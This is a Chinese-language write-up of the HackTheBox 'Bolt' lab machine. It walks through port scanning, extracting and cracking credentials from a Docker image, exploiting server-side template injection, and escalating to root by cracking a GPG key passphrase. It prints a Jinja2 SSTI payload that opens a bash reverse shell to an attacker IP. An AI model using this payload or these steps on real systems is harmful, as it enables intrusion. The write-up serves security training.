点击蓝字
关注我们
日期:2022-03-29
作者:herbmint
介绍:Hackthebox-Bolt靶机实战。
0x00 前言
Bolt
靶机为Linux
机器,上线时间为2021年9月25日
,难度级别Medium
,官方评分4.5
,主机IP
为:10.10.11.114
。
0x01 靶机实战
1.1 信息搜集
1) 使用nmap
进行端口扫描
开放端口有22、80、443
。对端口进行访问,发现80
端口搭建有web
服务。
web
服务页面模块下的目录。1.2漏洞探测
1)端口利用
查看80
端口开启的web
服务页面,发现其使用的是ADMIN LTE
进行管理。
/download
目录,这是一个下载页面,可以下载image.tar
文件。a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2
文件夹下的layer
文件中发现有一个数据库文件db.sqlite3
。hash
。join
对此hash
值进行破解,得到密码:deadbolt
。admin
、密码为deadbolt
和邮箱[email protected]
。AdminLTE Flask
框架。Docker
镜像,推测其可能存在其他的主机。hosts
文件中。mail.bolt.htb
之后发现这是个邮箱系统,利用之前得到的账户名密码登录,不能成功登录。demo.bolt.htb
,发现此页面和80
端口的页面是相同的,接着尝试之前的账户密码登录,不能登录。image
文件中查找邀请码,成功获取到邀请码。AdminLTE Flask
框架,我们可以找找传输数据的点,看看可不可以利用SSTI
漏洞。SSTI
。SSTI
了。shell
。{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.28/5555 0>&1"').read() }}
nc
开启监听5555
端口,成功反弹回shell
。1.3权限提升
1)将权限提升至用户权限
查看具有bash
权限的用户,可以看到除了root
用户之外还有两个其他的用户Eddie
和Clak
都可以被用于登录。
linpeas
提权辅助脚本,查看当前服务器有无可以利用的点。passbolt
目录下,查看一下此目录下的文件。passbolt.php
文件中,得到了数据库名和密码。secrets
表,里面有一些信息,但是我们没有私钥无法解密此信息。我们先将其复制出来保存为gpg.asc
文件,看之后会不会有用。user
的权限。root
权限linpeas
辅助提权脚本,查看有无可利用的点。key
的文件。/home/eddie/gpg.key
文件,这可能就是我们的私钥文件了。gpg2john
将其转换成hash
格式。hash
格式了,然后使用hash
破解的工具将私钥解密出来,我们得到了私钥:merrychristmas
。passbolt
数据库中得到的加密信息。首先,我们要导入eddie
的账户的私钥。root
用户,成功获取到root
权限。0x02总结
此靶机难度不是很高,首先利用源码文件得到了登录的账户名密码,后续发现存在其他主机,登录其他主机之后通过SSTI
漏洞拿到的权限又只是服务器的权限,需要提权到普通用户,提权到普通用户之后,又需要通过解密OpenPGP
的公钥私钥拿到密码,获取到root
权限。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
原文始发于微信公众号(宸极实验室):『靶场』Hackthebox-Bolt靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论